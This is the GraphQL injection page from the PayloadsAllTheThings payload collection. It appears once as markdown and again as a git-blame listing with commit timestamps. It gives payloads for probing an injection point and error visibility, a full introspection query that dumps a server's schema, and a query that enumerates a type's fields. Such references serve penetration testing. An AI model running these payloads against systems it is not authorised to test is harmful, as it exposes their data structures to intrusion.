PayloadsAllTheThings/GraphQL Injection/README.md

# GraphQL injection

> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.

## Exploit

Identify an injection point

```javascript
?param={__schema{types{name}}}
```
Check if errors are visible

```javascript
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
```

Enumerate Database Schema with the following GraphQL query

```javascript
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

```

Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type

```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```

## References

* [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00			`# GraphQL injection`

Command injection rewritten 2019-04-21 17:50:50 +00:00			`> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.`
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00
			`## Exploit`

			`Identify an injection point`

Command injection rewritten 2019-04-21 17:50:50 +00:00			```javascript
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00			`?param={__schema{types{name}}}`
			```
			`Check if errors are visible`

Command injection rewritten 2019-04-21 17:50:50 +00:00			```javascript
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00			`?param={__schema}`
			`?param={}`
			`?param={thisdefinitelydoesnotexist}`
			```

			`Enumerate Database Schema with the following GraphQL query`

Command injection rewritten 2019-04-21 17:50:50 +00:00			```javascript
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00			`fragment FullType on __Type {`
			`kind`
			`name`
			`description`
			`fields(includeDeprecated: true) {`
			`name`
			`description`
			`args {`
			`...InputValue`
			`}`
			`type {`
			`...TypeRef`
			`}`
			`isDeprecated`
			`deprecationReason`
			`}`
			`inputFields {`
			`...InputValue`
			`}`
			`interfaces {`
			`...TypeRef`
			`}`
			`enumValues(includeDeprecated: true) {`
			`name`
			`description`
			`isDeprecated`
			`deprecationReason`
			`}`
			`possibleTypes {`
			`...TypeRef`
			`}`
			`}`
			`fragment InputValue on __InputValue {`
			`name`
			`description`
			`type {`
			`...TypeRef`
			`}`
			`defaultValue`
			`}`
			`fragment TypeRef on __Type {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`ofType {`
			`kind`
			`name`
			`}`
			`}`
			`}`
			`}`
			`}`
			`}`
			`}`
			`}`

			`query IntrospectionQuery {`
			`__schema {`
			`queryType {`
			`name`
			`}`
			`mutationType {`
			`name`
			`}`
			`types {`
			`...FullType`
			`}`
			`directives {`
			`name`
			`description`
			`locations`
			`args {`
			`...InputValue`
			`}`
			`}`
			`}`
			`}`

			```

			`Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type`

Command injection rewritten 2019-04-21 17:50:50 +00:00			```javascript
Added GraphQL injection notes 2019-03-06 12:18:54 +00:00			`{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}`
			```

			`## References`

			`* [Introduction to GraphQL](https://graphql.org/learn/)`
			`* [GraphQL Introspection](https://graphql.org/learn/introspection/)`